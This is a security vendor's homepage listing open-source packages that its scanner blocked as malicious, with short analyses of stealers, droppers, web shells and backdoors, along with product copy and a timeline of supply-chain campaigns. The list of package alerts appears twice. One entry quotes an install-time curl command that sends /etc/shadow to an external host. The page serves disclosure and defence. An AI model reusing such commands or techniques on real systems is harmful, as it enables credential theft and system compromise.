New Research: Supply Chain Attack on Axios Pulls Malicious Dependency from npm.Details →
Socket
Book a DemoSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 4.0.0

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.2.4

We protect you from vulnerable and malicious packages

github.com/weaveworks/weave

v1.1.2-0.20151013080203-54a4add40fdb

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

354766/chirag2653/website-to-skill-folder/website-to-skill-folder/

09ca7f1f4ee9514ea8102e16299b2914449573f4

Live on socket

Blocked by Socket

[Skill Scanner] Natural language instruction to download and install from URL detected No direct malicious code or explicit backdoor indicators are present in the provided documentation fragment. The dominant security concerns are: (1) credential exposure risk from advising users to inline FIRECRAWL_API_KEY into shell commands, (2) privacy/third-party data exposure because page contents and credentials are sent to the Firecrawl service, and (3) general supply-chain risk of executing a local pipeline.py without verification. Recommended mitigations: avoid inlining secrets, inspect and verify pipeline.py before executing, restrict crawl scope to public pages, and prefer local crawling if privacy is required. For a definitive malware determination, review the actual pipeline.py implementation and any network endpoints it contacts. LLM verification: No explicit malicious code is present in this documentation fragment, but there are multiple supply-chain and operational security risks: (1) instructing users to place API keys inline on the command line (credential exposure), (2) recommending unpinned pip installs (package supply-chain risk), and (3) requiring execution of an unreviewed local script (scripts/pipeline.py) which could perform arbitrary actions. Recommend: do not run the pipeline.py until you review its source; avoid embedding AP

dana

0.25.7.29

Removed from pypi

Blocked by Socket

This module itself contains no obvious hidden backdoor or obfuscated malicious payload, but it intentionally executes external Python files found under multiple search paths (including user-writable locations like the current working directory and user home). That design introduces a high-risk supply-chain/plugin execution vector: untrusted plugin files named <domain>.py or package directories can run arbitrary code via exec_module and class instantiation. Recommend treating plugins from those paths as untrusted, restricting or validating plugin locations, using cryptographic signing or checksum verification, or executing plugins in an isolated process. Do not place sensitive credentials or run as privileged user when plugin discovery paths include writable directories.

Live on pypi for 6 hours and 53 minutes before removal. Socket users were protected even while the package was live.

@speedshop/sdk-api

21.5.4

by spongebhavh1

Live on npm

Blocked by Socket

The fragment exfiltrates local system information to an external domain without explicit user consent or clear documentation within the snippet. While it uses HTTPS for transport, the lack of consent, visibility, and controls constitutes a privacy and supply-chain concern. The code could be legitimate telemetry in some deployments, but as-is it presents a potential data leakage risk and warrants further provenance checks and disclosure.

mtmai

0.3.883

Live on pypi

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

erc4337

0.0.1

by snap_

Removed from npm

Blocked by Socket

The 'preinstall' script in 'package.json' attempts to exfiltrate the contents of the '/etc/shadow' file, which contains hashed user passwords, to a remote server at '<hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This is executed during installation using the command '/usr/bin/curl --data '@/etc/shadow' <hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This behavior poses a significant security risk as it attempts to steal sensitive system credentials.

Live on npm for 12 days and 55 minutes before removal. Socket users were protected even while the package was live.

@emilgroup/customer-sdk

1.54.5

by cover42devs

Removed from npm

Blocked by Socket

This script is a high-risk supply-chain abuse tool. It programmatically uses npm tokens from environment variables to enumerate package names owned by the token holders, temporarily alters local package metadata and README, and runs npm publish with the token to publish the repository contents as versions of those packages. It is likely intended to be used to mass-publish or backdoor packages when executed in environments with exposed tokens (e.g., CI). Treat presence of this script as malicious or highly dangerous: remove it, rotate any exposed tokens, audit CI environments for inadvertent exposure, and inspect any unexpected package versions published from your accounts.

Live on npm for 4 days, 3 hours and 9 minutes before removal. Socket users were protected even while the package was live.

poliduckie-segmentation

0.0.9

Live on pypi

Blocked by Socket

The model file is a standard UNet-like tf.keras model except it includes a Lambda layer with an embedded serialized Python function (opaque bytes). This pattern allows arbitrary code execution in the host Python process during model load or inference and therefore constitutes a high-risk supply-chain/deserialization threat. Treat the artifact as untrusted until the Lambda's payload is safely decoded and audited or the Lambda is removed/replaced with graph-native preprocessing.

tx-engine

0.6.1

Live on pypi

Blocked by Socket

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

hnypdf

2.1.0

by heningyuan

Live on npm

Blocked by Socket

This module is primarily a client-side PDF annotator/exporter, but it also performs high-risk remote behavior: it embeds object storage credentials directly in the client and uploads user-selected non-PDF content to external infrastructure, then calls a hardcoded external HTTP backend to process and return content. This creates a clear data-exfiltration/remote-processing supply-chain risk. There is no clear evidence of classic execution-based malware in the excerpt, but the credential exposure + fixed egress endpoints make the security posture unacceptable without remediation (remove embedded secrets, move uploads/processing to a trusted backend with proper auth, use HTTPS, and make endpoints configurable/auditable).

sharpgl

1.0.0

by gkoeh963xv

Removed from npm

Blocked by Socket

The code is malicious and poses a serious security risk. It performs unauthorized collection of extensive system and user environment information and stealthily exfiltrates this data to a hardcoded remote server. This is a clear supply chain security incident involving data theft. The obfuscation and silent error handling reinforce the intent to evade detection. Immediate removal and blocking of this package is strongly recommended.

Live on npm for 9 days, 11 hours and 44 minutes before removal. Socket users were protected even while the package was live.

prior-cli

1.3.3

by prior.network

Live on npm

Blocked by Socket

This dependency/module exposes multiple high-impact host-control primitives: arbitrary command execution (unvalidated interpolation), clipboard read/write (including direct clipboard exfiltration to the caller), and writing attacker-influenced base64 content to a filesystem path influenced by remote filename plus cwd. It also forwards bearer tokens to external services. While the code is not visibly obfuscated, the capability set is sufficiently dangerous that the module should be treated as security-critical and requires strict access control, input validation, and path hardening around tool invocation and remote filename handling.

spyware

1.0.2

Live on pypi

Blocked by Socket

This setup script packages and installs a program explicitly designed as 'SpyWare'. It contains multiple high-risk behaviors: running shell commands at install time (including sudo apt-get), invoking pip to install a wheel by constructed filename, registering a console script that will execute spying code, and linking to prebuilt binaries. The file strongly indicates intentional malicious functionality (keylogging, screenshotting, webcam/audio capture, clipboard and file monitoring). Do not install or run this package. Further inspection of the package's runtime modules and any distributed binaries is required to enumerate full capabilities and exfiltration channels.

github.com/sourcegraph/sourcegraph

v0.0.0-20210114141206-73fa30e0f52a

Live on go

Blocked by Socket

This module is a deliberate destructive utility that corrupts all .zip files in a specified directory by truncating each archive to half its size and appending repeated junk data. While it lacks common malware features like networking or data exfiltration, the behavior is strongly indicative of sabotage and would be unacceptable in most software supply-chain contexts due to its potential to break builds, deployments, or artifact integrity.

fca-rqzax

6.1.5

by rqzax2

Removed from npm

Blocked by Socket

This code is highly suspicious and should not be used without further investigation. The code is heavily obfuscated and could potentially contain malicious code. The purpose of the code is unclear and further investigation is necessary to determine its exact behavior.

Live on npm for 42 minutes before removal. Socket users were protected even while the package was live.

com.meta.utilities

99.0.0

by vk258986

Removed from npm

Blocked by Socket

This module collects host- and user-identifying data (including package name/version, hostname, username, home directory, DNS servers and output of 'uname -a') and transmits it to a hardcoded external domain via an HTTPS GET and a DNS lookup. There is no user consent or configuration. This behavior constitutes data exfiltration and is malicious or at least highly suspicious for a production dependency. Recommend removing or isolating the package, blocking network access to the domain, and investigating how this code was introduced.

Live on npm for 19 hours and 33 minutes before removal. Socket users were protected even while the package was live.

cylab-be/webshell-detector

dev-include_wowa_training

Live on composer

Blocked by Socket

This Python 2 script is an interactive controller meant to send arbitrary shell commands to a web-based backdoor endpoint specified by the user. Though it contains coding errors that prevent execution as-is, its intent is clearly malicious (remote command execution/C2 controller). Treat it as malware/abuse tooling: do not run it against systems you do not own or administer. Remove from trusted supply chains and investigate related artifacts if found in a project.

cylab-be/webshell-detector

dev-include_wowa_training

Live on composer

Blocked by Socket

This PHP file is a malicious web shell/backdoor (NetworkFileManagerPHP) designed for unauthorized access and abuse. It enables remote command execution (via system/exec and a command box), arbitrary file read/write/upload, remote binary download and execution (bind shell), credential harvesting, FTP bruteforcing, mass emailing/spamming, and database dumping. It also automatically exfiltrates server/environment information to hardcoded external email addresses. This is active malware/backdoor code and should not be deployed; any server containing it should be considered compromised and undergo incident response.

matialvarezs-time-sleep

0.1.47

Live on pypi

Blocked by Socket

Severe security vulnerability: the module eval()s the 'stop' field of a remote JSON response, enabling arbitrary remote code execution. This constitutes a backdoor/supply-chain risk if the configured URL or response can be controlled. Additional quality issues (undefined return variable, lack of error handling, unused string) exist. Do not use this code as-is — replace eval with safe parsing/validation, secure the remote endpoint (authentication, integrity checks), and fix the bug and error handling.

ailever

1.0.80

Live on pypi

Blocked by Socket

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

github.com/weaveworks/weave

v1.2.1-0.20151103175540-e95e3cc29dc1

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

zohodeskportalsdksampleappsreactnative

3.1.0

by testme000123

Removed from npm

Blocked by Socket

The script attempts to send sensitive system information to an external server, which poses a significant security risk and is indicative of malicious intent.

Live on npm for 4 hours and 39 minutes before removal. Socket users were protected even while the package was live.

@ambuj.bhaskar/react-component-library

0.30.9

by ambuj.bhaskar

Live on npm

Blocked by Socket

This module contains a deliberate malicious/unwanted payload: a locale-and-host targeted routine that disables user interaction and injects/plays an externally hosted audio file (https://flag-gimn.ru/...). This behavior is not legitimate for an annotation/UI library and should be considered malicious backdoor/tampering. Remove that conditional block immediately and audit repository history/maintainers for supply-chain compromise. The remainder of the code appears to implement expected UI/annotation functionality (hotkeys, canvas rendering, network mutate calls) but should be audited in context; network mutations are legitimate sinks for user data and should be validated (endpoints, auth). Treat the package as compromised until provenance is verified.

agent-messenger

2.6.3

by GitHub Actions

Live on npm

Blocked by Socket

This module is an explicit, purpose-built Instagram cookie/session token extractor. It scans multiple browser profile cookie databases, copies them to temporary storage, filters for Instagram authentication cookies, and decrypts protected cookie values using OS credential/crypto mechanisms (Windows DPAPI via PowerShell, macOS keychain via `security` CLI, and Linux with deterministic derived-key decryption). It then returns plaintext session-critical cookies to the caller, which would enable account/session hijacking. No network exfiltration is shown in this code fragment, but the capability to harvest and recover usable authentication material is strongly malicious/high-risk.

github.com/weaveworks/weave

v1.1.2-0.20151013080203-54a4add40fdb

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

354766/chirag2653/website-to-skill-folder/website-to-skill-folder/

09ca7f1f4ee9514ea8102e16299b2914449573f4

Live on socket

Blocked by Socket

[Skill Scanner] Natural language instruction to download and install from URL detected No direct malicious code or explicit backdoor indicators are present in the provided documentation fragment. The dominant security concerns are: (1) credential exposure risk from advising users to inline FIRECRAWL_API_KEY into shell commands, (2) privacy/third-party data exposure because page contents and credentials are sent to the Firecrawl service, and (3) general supply-chain risk of executing a local pipeline.py without verification. Recommended mitigations: avoid inlining secrets, inspect and verify pipeline.py before executing, restrict crawl scope to public pages, and prefer local crawling if privacy is required. For a definitive malware determination, review the actual pipeline.py implementation and any network endpoints it contacts. LLM verification: No explicit malicious code is present in this documentation fragment, but there are multiple supply-chain and operational security risks: (1) instructing users to place API keys inline on the command line (credential exposure), (2) recommending unpinned pip installs (package supply-chain risk), and (3) requiring execution of an unreviewed local script (scripts/pipeline.py) which could perform arbitrary actions. Recommend: do not run the pipeline.py until you review its source; avoid embedding AP

dana

0.25.7.29

Removed from pypi

Blocked by Socket

This module itself contains no obvious hidden backdoor or obfuscated malicious payload, but it intentionally executes external Python files found under multiple search paths (including user-writable locations like the current working directory and user home). That design introduces a high-risk supply-chain/plugin execution vector: untrusted plugin files named <domain>.py or package directories can run arbitrary code via exec_module and class instantiation. Recommend treating plugins from those paths as untrusted, restricting or validating plugin locations, using cryptographic signing or checksum verification, or executing plugins in an isolated process. Do not place sensitive credentials or run as privileged user when plugin discovery paths include writable directories.

Live on pypi for 6 hours and 53 minutes before removal. Socket users were protected even while the package was live.

@speedshop/sdk-api

21.5.4

by spongebhavh1

Live on npm

Blocked by Socket

The fragment exfiltrates local system information to an external domain without explicit user consent or clear documentation within the snippet. While it uses HTTPS for transport, the lack of consent, visibility, and controls constitutes a privacy and supply-chain concern. The code could be legitimate telemetry in some deployments, but as-is it presents a potential data leakage risk and warrants further provenance checks and disclosure.

mtmai

0.3.883

Live on pypi

Blocked by Socket

This fragment intends to install and start KasmVNC by running many shell commands that create certs, write VNC password files, adjust group membership, and launch a VNC server. The primary security issues are unsafe shell interpolation (command injection risk), programmatic persistence of a possibly predictable password, execution with sudo based on unvalidated env vars, starting a VNC server exposed on 0.0.0.0 with disabled/basic auth, and multiple unsafe filesystem operations performed via shell. There is no clear evidence of obfuscated or direct exfiltration malware, but the behavior can provide an unauthorized remote access vector (backdoor-like) if used maliciously. Do not run this code without fixing shell usage, validating inputs, using secure randomly generated passwords, enforcing proper file permissions, and not disabling authentication.

erc4337

0.0.1

by snap_

Removed from npm

Blocked by Socket

The 'preinstall' script in 'package.json' attempts to exfiltrate the contents of the '/etc/shadow' file, which contains hashed user passwords, to a remote server at '<hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This is executed during installation using the command '/usr/bin/curl --data '@/etc/shadow' <hostname>9w60yxv7jwwi1lbc6iqc5exrlir8fx.oastify[.]com'. This behavior poses a significant security risk as it attempts to steal sensitive system credentials.

Live on npm for 12 days and 55 minutes before removal. Socket users were protected even while the package was live.

@emilgroup/customer-sdk

1.54.5

by cover42devs

Removed from npm

Blocked by Socket

This script is a high-risk supply-chain abuse tool. It programmatically uses npm tokens from environment variables to enumerate package names owned by the token holders, temporarily alters local package metadata and README, and runs npm publish with the token to publish the repository contents as versions of those packages. It is likely intended to be used to mass-publish or backdoor packages when executed in environments with exposed tokens (e.g., CI). Treat presence of this script as malicious or highly dangerous: remove it, rotate any exposed tokens, audit CI environments for inadvertent exposure, and inspect any unexpected package versions published from your accounts.

Live on npm for 4 days, 3 hours and 9 minutes before removal. Socket users were protected even while the package was live.

poliduckie-segmentation

0.0.9

Live on pypi

Blocked by Socket

The model file is a standard UNet-like tf.keras model except it includes a Lambda layer with an embedded serialized Python function (opaque bytes). This pattern allows arbitrary code execution in the host Python process during model load or inference and therefore constitutes a high-risk supply-chain/deserialization threat. Treat the artifact as untrusted until the Lambda's payload is safely decoded and audited or the Lambda is removed/replaced with graph-native preprocessing.

tx-engine

0.6.1

Live on pypi

Blocked by Socket

The code contains a critical security flaw: untrusted input can be executed via eval(op), enabling arbitrary code execution. The presence of an incomplete assertion at the end adds unreliability and potential crashes. While there is a structured path for known operations, the fallback to eval constitutes a severe vulnerability that undermines supply-chain safety for any package exposing decode_op. Recommend removing eval usage, implementing a safe expression evaluator or whitelist, and adding robust input validation and error handling.

hnypdf

2.1.0

by heningyuan

Live on npm

Blocked by Socket

This module is primarily a client-side PDF annotator/exporter, but it also performs high-risk remote behavior: it embeds object storage credentials directly in the client and uploads user-selected non-PDF content to external infrastructure, then calls a hardcoded external HTTP backend to process and return content. This creates a clear data-exfiltration/remote-processing supply-chain risk. There is no clear evidence of classic execution-based malware in the excerpt, but the credential exposure + fixed egress endpoints make the security posture unacceptable without remediation (remove embedded secrets, move uploads/processing to a trusted backend with proper auth, use HTTPS, and make endpoints configurable/auditable).

sharpgl

1.0.0

by gkoeh963xv

Removed from npm

Blocked by Socket

The code is malicious and poses a serious security risk. It performs unauthorized collection of extensive system and user environment information and stealthily exfiltrates this data to a hardcoded remote server. This is a clear supply chain security incident involving data theft. The obfuscation and silent error handling reinforce the intent to evade detection. Immediate removal and blocking of this package is strongly recommended.

Live on npm for 9 days, 11 hours and 44 minutes before removal. Socket users were protected even while the package was live.

prior-cli

1.3.3

by prior.network

Live on npm

Blocked by Socket

This dependency/module exposes multiple high-impact host-control primitives: arbitrary command execution (unvalidated interpolation), clipboard read/write (including direct clipboard exfiltration to the caller), and writing attacker-influenced base64 content to a filesystem path influenced by remote filename plus cwd. It also forwards bearer tokens to external services. While the code is not visibly obfuscated, the capability set is sufficiently dangerous that the module should be treated as security-critical and requires strict access control, input validation, and path hardening around tool invocation and remote filename handling.

spyware

1.0.2

Live on pypi

Blocked by Socket

This setup script packages and installs a program explicitly designed as 'SpyWare'. It contains multiple high-risk behaviors: running shell commands at install time (including sudo apt-get), invoking pip to install a wheel by constructed filename, registering a console script that will execute spying code, and linking to prebuilt binaries. The file strongly indicates intentional malicious functionality (keylogging, screenshotting, webcam/audio capture, clipboard and file monitoring). Do not install or run this package. Further inspection of the package's runtime modules and any distributed binaries is required to enumerate full capabilities and exfiltration channels.

github.com/sourcegraph/sourcegraph

v0.0.0-20210114141206-73fa30e0f52a

Live on go

Blocked by Socket

This module is a deliberate destructive utility that corrupts all .zip files in a specified directory by truncating each archive to half its size and appending repeated junk data. While it lacks common malware features like networking or data exfiltration, the behavior is strongly indicative of sabotage and would be unacceptable in most software supply-chain contexts due to its potential to break builds, deployments, or artifact integrity.

fca-rqzax

6.1.5

by rqzax2

Removed from npm

Blocked by Socket

This code is highly suspicious and should not be used without further investigation. The code is heavily obfuscated and could potentially contain malicious code. The purpose of the code is unclear and further investigation is necessary to determine its exact behavior.

Live on npm for 42 minutes before removal. Socket users were protected even while the package was live.

com.meta.utilities

99.0.0

by vk258986

Removed from npm

Blocked by Socket

This module collects host- and user-identifying data (including package name/version, hostname, username, home directory, DNS servers and output of 'uname -a') and transmits it to a hardcoded external domain via an HTTPS GET and a DNS lookup. There is no user consent or configuration. This behavior constitutes data exfiltration and is malicious or at least highly suspicious for a production dependency. Recommend removing or isolating the package, blocking network access to the domain, and investigating how this code was introduced.

Live on npm for 19 hours and 33 minutes before removal. Socket users were protected even while the package was live.

cylab-be/webshell-detector

dev-include_wowa_training

Live on composer

Blocked by Socket

This Python 2 script is an interactive controller meant to send arbitrary shell commands to a web-based backdoor endpoint specified by the user. Though it contains coding errors that prevent execution as-is, its intent is clearly malicious (remote command execution/C2 controller). Treat it as malware/abuse tooling: do not run it against systems you do not own or administer. Remove from trusted supply chains and investigate related artifacts if found in a project.

cylab-be/webshell-detector

dev-include_wowa_training

Live on composer

Blocked by Socket

This PHP file is a malicious web shell/backdoor (NetworkFileManagerPHP) designed for unauthorized access and abuse. It enables remote command execution (via system/exec and a command box), arbitrary file read/write/upload, remote binary download and execution (bind shell), credential harvesting, FTP bruteforcing, mass emailing/spamming, and database dumping. It also automatically exfiltrates server/environment information to hardcoded external email addresses. This is active malware/backdoor code and should not be deployed; any server containing it should be considered compromised and undergo incident response.

matialvarezs-time-sleep

0.1.47

Live on pypi

Blocked by Socket

Severe security vulnerability: the module eval()s the 'stop' field of a remote JSON response, enabling arbitrary remote code execution. This constitutes a backdoor/supply-chain risk if the configured URL or response can be controlled. Additional quality issues (undefined return variable, lack of error handling, unused string) exist. Do not use this code as-is — replace eval with safe parsing/validation, secure the remote endpoint (authentication, integrity checks), and fix the bug and error handling.

ailever

1.0.80

Live on pypi

Blocked by Socket

This script is a high-risk launcher: it unconditionally fetches Python code from a hardcoded remote repo and executes it locally via a shell-invoked Python process while passing unsanitized user inputs directly into the shell command. Even if the upstream repository is currently benign, the pattern enables trivial supply-chain compromise and shell injection. Mitigations: remove runtime download-and-exec; if fetching is necessary, pin and verify cryptographic hashes or signatures, validate content, avoid os.system (use subprocess with argument lists or importlib), sanitize inputs, and add error handling and logging. Treat this module as unsafe in security-sensitive environments until hardened.

github.com/weaveworks/weave

v1.2.1-0.20151103175540-e95e3cc29dc1

Live on go

Blocked by Socket

This module is a high-risk runtime packer/dropper: it embeds an encrypted payload, decrypts it using a user-supplied passphrase, writes the result to `bin/do-setup-circleci-secrets`, and immediately executes it. Because there is no integrity/authenticity validation of the decrypted artifact and the executed code is not shown here, the module should be treated as potentially malicious until the decrypted `bin/do-setup-circleci-secrets` content is inspected and validated in a safe environment.

zohodeskportalsdksampleappsreactnative

3.1.0

by testme000123

Removed from npm

Blocked by Socket

The script attempts to send sensitive system information to an external server, which poses a significant security risk and is indicative of malicious intent.

Live on npm for 4 hours and 39 minutes before removal. Socket users were protected even while the package was live.

@ambuj.bhaskar/react-component-library

0.30.9

by ambuj.bhaskar

Live on npm

Blocked by Socket

This module contains a deliberate malicious/unwanted payload: a locale-and-host targeted routine that disables user interaction and injects/plays an externally hosted audio file (https://flag-gimn.ru/...). This behavior is not legitimate for an annotation/UI library and should be considered malicious backdoor/tampering. Remove that conditional block immediately and audit repository history/maintainers for supply-chain compromise. The remainder of the code appears to implement expected UI/annotation functionality (hotkeys, canvas rendering, network mutate calls) but should be audited in context; network mutations are legitimate sinks for user data and should be validated (endpoints, auth). Treat the package as compromised until provenance is verified.

agent-messenger

2.6.3

by GitHub Actions

Live on npm

Blocked by Socket

This module is an explicit, purpose-built Instagram cookie/session token extractor. It scans multiple browser profile cookie databases, copies them to temporary storage, filters for Instagram authentication cookies, and decrypts protected cookie values using OS credential/crypto mechanisms (Windows DPAPI via PowerShell, macOS keychain via `security` CLI, and Linux with deterministic derived-key decryption). It then returns plaintext session-critical cookies to the caller, which would enable account/session hijacking. No network exfiltration is shown in this code fragment, but the capability to harvest and recover usable authentication material is strongly malicious/high-risk.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Possible typosquat attack

Known malware

Unstable ownership

Git dependency

GitHub dependency

AI-detected potential malware

HTTP dependency

Obfuscated code

Skill: Pre-execution shell command

Suspicious Stars on GitHub

55 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Book a DemoRead the blog

Protect every package in your stack

Secure your team's dependencies across your stack with Socket. Stop supply chain attacks before they reach production.

View all integrations

RUST

crates.io

Rust Package Manager

PHP

Packagist

PHP Package Manager

GOLANG

Go Modules

Go Dependency Management

JAVA

Maven Central

JAVASCRIPT

npm

Node Package Manager

.NET

NuGet

.NET Package Manager

PYTHON

PyPI

Python Package Index

RUBY

RubyGems.org

Ruby Package Manager

SWIFT

Swift

AI

Hugging Face Hub

AI Model Hub

CI

GitHub Actions

CI/CD Workflows

EXTENSIONS

Chrome Web Store

Chrome Browser Extensions

EXTENSIONS

Open VSX

VS Code Extensions

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Nov 23, 2025

Shai Hulud v2

Shai Hulud v2 campaign: preinstall script (setup_bun.js) and loader (setup_bin.js) that installs/locates Bun and executes an obfuscated bundled malicious script (bun_environment.js) with suppressed output.

Nov 05, 2025

Elves on npm

A surge of auto-generated "elf-stats" npm packages is being published every two minutes from new accounts. These packages contain simple malware variants and are being rapidly removed by npm. At least 420 unique packages have been identified, often described as being generated every two minutes, with some mentioning a capture the flag challenge or test.

Jul 04, 2025

RubyGems Automation-Tool Infostealer

Since at least March 2023, a threat actor using multiple aliases uploaded 60 malicious gems to RubyGems that masquerade as automation tools (Instagram, TikTok, Twitter, Telegram, WordPress, and Naver). The gems display a Korean Glimmer-DSL-LibUI login window, then exfiltrate the entered username/password and the host's MAC address via HTTP POST to threat actor-controlled infrastructure.

Mar 13, 2025

North Korea's Contagious Interview Campaign

Since late 2024, we have tracked hundreds of malicious npm packages and supporting infrastructure tied to North Korea's Contagious Interview operation, with tens of thousands of downloads targeting developers and tech job seekers. The threat actors run a factory-style playbook: recruiter lures and fake coding tests, polished GitHub templates, and typosquatted or deceptive dependencies that install or import into real projects.

Jul 23, 2024

Network Reconnaissance Campaign

A malicious npm supply chain attack that leveraged 60 packages across three disposable npm accounts to fingerprint developer workstations and CI/CD servers during installation. Each package embedded a compact postinstall script that collected hostnames, internal and external IP addresses, DNS resolvers, usernames, home and working directories, and package metadata, then exfiltrated this data as a JSON blob to a hardcoded Discord webhook.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles